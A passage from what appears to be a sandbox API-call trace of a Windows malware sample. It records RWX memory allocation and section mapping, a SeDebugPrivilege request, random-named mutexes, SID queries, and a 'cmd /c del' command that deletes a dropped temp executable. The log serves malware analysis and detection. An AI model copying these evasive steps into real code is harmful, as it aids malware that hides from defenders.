FileInformation=0xdf1ac, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf254, FileInformation=0xdf1ac) returned 0x0 [0130.854] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1788a0) returned 0xb1a020 [0130.904] NtReadFile (in: FileHandle=0x88, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xdf254, Buffer=0xb1a020, BufferLength=0x1784a0, ByteOffset=0xdf1c4*=0, Key=0x0 | out: IoStatusBlock=0xdf254, Buffer=0xb1a020*) returned 0x0 [0130.914] NtClose (Handle=0x88) returned 0x0 [0130.914] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x17b001) returned 0xcd6020 [0130.944] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0xb1a020) returned 1 [0130.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdf240*=0x0, ZeroBits=0x0, RegionSize=0xdf244*=0x2f9522, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xdf240*=0x6430000, RegionSize=0xdf244*=0x2fa000) returned 0x0 [0131.018] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6f8690 [0131.018] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6f9698 [0131.020] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6fa6a0 [0131.020] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x2000) returned 0x6fb6a8 [0131.021] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6fa6a0) returned 1 [0131.022] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x3000) returned 0x6fd6b0 [0131.022] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6fb6a8) returned 1 [0131.023] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x4000) returned 0x7006b8 [0131.023] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6fd6b0) returned 1 [0131.023] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x5000) returned 0x6fa6a0 [0131.024] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7006b8) returned 1 [0131.024] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6ff6a8 [0131.024] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x2000) returned 0x7006b0 [0131.024] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6ff6a8) returned 1 [0131.024] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x3000) returned 0x7026b8 [0131.025] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7006b0) returned 1 [0131.025] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x4000) returned 0x7056c0 [0131.025] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7026b8) returned 1 [0131.025] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x5000) returned 0x6ff6a8 [0131.026] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7056c0) returned 1 [0131.026] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x7046b0 [0131.026] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x2000) returned 0x7056b8 [0131.027] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7046b0) returned 1 [0131.027] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x3000) returned 0x7076c0 [0131.027] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7056b8) returned 1 [0131.027] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x4000) returned 0x70a6c8 [0131.028] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7076c0) returned 1 [0131.028] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x5000) returned 0x7046b0 [0131.029] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x70a6c8) returned 1 [0131.037] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f8690) returned 1 [0131.038] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f9698) returned 1 [0131.038] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6fa6a0) returned 1 [0131.039] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6ff6a8) returned 1 [0131.039] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7046b0) returned 1 [0131.068] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6f8690 [0131.068] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6f9698 [0131.068] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6fa6a0 [0131.068] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x2000) returned 0x6fb6a8 [0131.068] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6fa6a0) returned 1 [0131.068] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x3000) returned 0x6fd6b0 [0131.069] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6fb6a8) returned 1 [0131.069] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x4000) returned 0x7006b8 [0131.069] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6fd6b0) returned 1 [0131.070] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x5000) returned 0x6fa6a0 [0131.071] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7006b8) returned 1 [0131.072] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6ff6a8 [0131.072] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x2000) returned 0x7006b0 [0131.073] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6ff6a8) returned 1 [0131.073] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x3000) returned 0x7026b8 [0131.073] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7006b0) returned 1 [0131.074] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x4000) returned 0x7056c0 [0131.075] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7026b8) returned 1 [0131.077] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x5000) returned 0x6ff6a8 [0131.077] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7056c0) returned 1 [0131.078] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x7046b0 [0131.078] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x2000) returned 0x7056b8 [0131.078] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7046b0) returned 1 [0131.078] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x3000) returned 0x7076c0 [0131.079] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7056b8) returned 1 [0131.079] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x4000) returned 0x70a6c8 [0131.079] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7076c0) returned 1 [0131.079] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x5000) returned 0x7046b0 [0131.080] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x70a6c8) returned 1 [0131.080] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f8690) returned 1 [0131.081] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f9698) returned 1 [0131.081] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6fa6a0) returned 1 [0131.081] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6ff6a8) returned 1 [0131.082] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7046b0) returned 1 [0131.082] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdf1ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0131.082] NtCreateFile (in: FileHandle=0xdf20c, DesiredAccess=0x120089, ObjectAttributes=0xdf1d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf1f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf20c*=0x88, IoStatusBlock=0xdf1f4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0131.083] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f3980) returned 1 [0131.083] NtQueryInformationFile (in: FileHandle=0x88, IoStatusBlock=0xdf1f4, FileInformation=0xdef68, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0xdf1f4, FileInformation=0xdef68) returned 0x0 [0131.083] NtClose (Handle=0x88) returned 0x0 [0131.084] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x208) returned 0x6f8690 [0131.084] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f8690) returned 1 [0131.092] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x63a311d0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0xdf228, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0xdf228*(BaseAddress=0x63a31000, AllocationBase=0x63a30000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0131.672] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0xdf280, Length=0x2, ResultLength=0x0 | out: SystemInformation=0xdf280, ResultLength=0x0) returned 0x0 [0131.694] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0xdf2a4, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdf2a4, ReturnLength=0x0) returned 0x0 [0131.738] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0xcd6020) returned 1 [0131.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdef34*=0x0, ZeroBits=0x0, RegionSize=0xdef38*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdef34*=0x490000, RegionSize=0xdef38*=0x10000) returned 0x0 [0131.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x490000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x490000, ResultLength=0x0) returned 0xc0000004 [0131.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf294*=0x490000, RegionSize=0xdef58, FreeType=0x8000) returned 0x0 [0131.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdef20*=0x0, ZeroBits=0x0, RegionSize=0xdef24*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdef20*=0x490000, RegionSize=0xdef24*=0x20000) returned 0x0 [0131.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x490000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x490000, ResultLength=0x0) returned 0x0 [0131.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf294*=0x490000, RegionSize=0xdf298, FreeType=0x8000) returned 0x0 [0131.905] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdf050 | out: Value="RDhJ0CNFevzX") returned 0x0 [0131.906] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0xdf0c0 | out: BaseAddress=0xdf0c0*=0x74810000) returned 0x0 [0131.970] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xdf2ac | out: TokenHandle=0xdf2ac*=0x98) returned 0x0 [0131.975] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xdf2a0 | out: lpLuid=0xdf2a0*(LowPart=0x14, HighPart=0)) returned 1 [0131.984] NtAdjustPrivilegesToken (in: TokenHandle=0x98, DisableAllPrivileges=0, NewState=0xdf29c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0131.986] NtClose (Handle=0x98) returned 0x0 [0131.986] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdedf4 | out: Value="RDhJ0CNFevzX") returned 0x0 [0131.986] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="6NON26-3", Value=0xdf08c | out: Value=0xdf08c) returned 0xc0000100 [0131.996] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdebd4 | out: Value="RDhJ0CNFevzX") returned 0x0 [0132.012] NtOpenDirectoryObject (in: FileHandle=0xdee80, DesiredAccess=0x2000f, ObjectAttributes=0xdee4c*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0xdee80*=0x98) returned 0x0 [0132.014] NtCreateMutant (in: MutantHandle=0xdf0ac, DesiredAccess=0x1f0001, ObjectAttributes=0xdee34*(Length=0x18, RootDirectory=0x98, ObjectName="6NON26-3X60UXYXz", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0xdf0ac*=0xb8) returned 0x0 [0132.014] NtClose (Handle=0x98) returned 0x0 [0132.014] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdeab4 | out: Value="RDhJ0CNFevzX") returned 0x0 [0132.015] NtOpenDirectoryObject (in: FileHandle=0xdee78, DesiredAccess=0x2000f, ObjectAttributes=0xdee44*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0xdee78*=0x98) returned 0x0 [0132.015] NtCreateMutant (in: MutantHandle=0xdf0a4, DesiredAccess=0x1f0001, ObjectAttributes=0xdee2c*(Length=0x18, RootDirectory=0x98, ObjectName="5M764PD81WX9E20z", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0xdf0a4*=0xbc) returned 0x0 [0132.015] NtClose (Handle=0x98) returned 0x0 [0132.022] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6fbe38 [0132.022] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6fce40 [0132.022] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x6fde48 [0132.026] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xdecbc | out: Value="C:\\Program Files (x86)") returned 0x0 [0132.026] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xdece8 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0132.036] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Temp\\pkypr.exe", NtPathName=0xdec94, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Temp\\pkypr.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0132.038] NtCreateFile (in: FileHandle=0xdecb4, DesiredAccess=0x120089, ObjectAttributes=0xdec7c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Temp\\pkypr.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdec9c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdecb4*=0x0, IoStatusBlock=0xdec9c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0132.039] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f8d78) returned 1 [0132.039] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe", NtPathName=0xdf064, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0132.039] NtCreateFile (in: FileHandle=0xdf084, DesiredAccess=0x120089, ObjectAttributes=0xdf04c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf06c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf084*=0x98, IoStatusBlock=0xdf06c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0132.040] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6fabb8) returned 1 [0132.056] NtQueryInformationFile (in: FileHandle=0x98, IoStatusBlock=0xdf06c, FileInformation=0xdefc4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf06c, FileInformation=0xdefc4) returned 0x0 [0132.057] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1800) returned 0x6fee50 [0132.063] NtReadFile (in: FileHandle=0x98, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xdf06c, Buffer=0x6fee50, BufferLength=0x1400, ByteOffset=0xdefdc*=0, Key=0x0 | out: IoStatusBlock=0xdf06c, Buffer=0x6fee50*) returned 0x0 [0132.063] NtClose (Handle=0x98) returned 0x0 [0132.065] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe", NtPathName=0xdf054, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0132.065] NtCreateFile (in: FileHandle=0xdf074, DesiredAccess=0x120089, ObjectAttributes=0xdf03c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf05c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf074*=0x98, IoStatusBlock=0xdf05c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0132.066] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6fabb8) returned 1 [0132.066] NtQueryInformationFile (in: FileHandle=0x98, IoStatusBlock=0xdf05c, FileInformation=0xdefb4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf05c, FileInformation=0xdefb4) returned 0x0 [0132.066] NtClose (Handle=0x98) returned 0x0 [0132.068] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xde554, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0132.068] NtCreateFile (in: FileHandle=0xde574, DesiredAccess=0x120089, ObjectAttributes=0xde53c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde55c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde574*=0x98, IoStatusBlock=0xde55c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0132.068] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x6f45d0) returned 1 [0132.068] NtQueryInformationFile (in: FileHandle=0x98, IoStatusBlock=0xde55c, FileInformation=0xde2d0, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0xde55c, FileInformation=0xde2d0) returned 0x0 [0132.068] NtClose (Handle=0x98) returned 0x0 [0132.068] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x208) returned 0x700658 [0132.069] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x700658) returned 1 [0132.072] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\cmd.exe", lpCommandLine="/c del \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xdec24*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xdec68, hNewToken=0x0 | out: lpProcessInformation=0xdec68*(hProcess=0xc0, hThread=0x98, dwProcessId=0x630, dwThreadId=0x6d8), hNewToken=0x0) returned 1 [0132.963] NtWaitForSingleObject (Object=0xc0, Alertable=0, Time=0x0) returned 0x0 [0136.587] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde940 | out: Value="C:\\Program Files (x86)") returned 0x0 [0136.708] SetErrorMode (uMode=0x8003) returned 0x1 [0136.755] NtCreateSection (in: SectionHandle=0xdeccc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xdea48, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xdeccc*=0xc8) returned 0x0 [0136.759] NtMapViewOfSection (in: SectionHandle=0xc8, ProcessHandle=0xffffffff, BaseAddress=0xdecd0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea48*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xdecd0*=0x490000, SectionOffset=0x0, ViewSize=0xdea48*=0x2f000) returned 0x0 [0136.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea40*=0x0, ZeroBits=0x0, RegionSize=0xdea44*=0x2e200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xdea40*=0x4c0000, RegionSize=0xdea44*=0x2f000) returned 0x0 [0136.770] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x2000) returned 0x700658 [0136.771] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde784 | out: TokenHandle=0xde784*=0xc4) returned 0x0 [0136.779] NtQueryInformationToken (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0xddf7c, TokenInformationLength=0x400, ReturnLength=0xde77c | out: TokenInformation=0xddf7c, ReturnLength=0xde77c) returned 0x0 [0136.780] ConvertSidToStringSidW (in: Sid=0xddf84*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde780 | out: StringSid=0xde780*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0136.780] NtClose (Handle=0xc4) returned 0x0 [0136.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xde9f4*=0x0, ZeroBits=0x0, RegionSize=0xde9f8*=0x92fc6, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xde9f4*=0xb10000, RegionSize=0xde9f8*=0x93000) returned 0x0 [0136.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xde9e0*=0x0, ZeroBits=0x0, RegionSize=0xde9e4*=0x92fc6, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xde9e0*=0xbb0000, RegionSize=0xde9e4*=0x93000) returned 0x0 [0136.988] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x700658) returned 1 [0136.989] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x700658 [0136.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0136.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0137.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0137.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0137.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0137.031] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xde108 | out: Value="RDhJ0CNFevzX") returned 0x0 [0137.031] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde474 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0137.032] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde48c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0137.032] NtCreateSection (in: SectionHandle=0xdfabc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde4c4, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xdfabc*=0xc4) returned 0x0 [0137.032] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xffffffff, BaseAddress=0xdfab8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde4c4*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdfab8*=0x6730000, SectionOffset=0x0, ViewSize=0xde4c4*=0x9c4000) returned 0x0 [0137.032] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x4000) returned 0x701660 [0137.036] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xddc28 | out: TokenHandle=0xddc28*=0xd4) returned 0x0 [0137.036] NtQueryInformationToken (in: TokenHandle=0xd4, TokenInformationClass=0x1, TokenInformation=0xdd420, TokenInformationLength=0x400, ReturnLength=0xddc20 | out: TokenInformation=0xdd420, 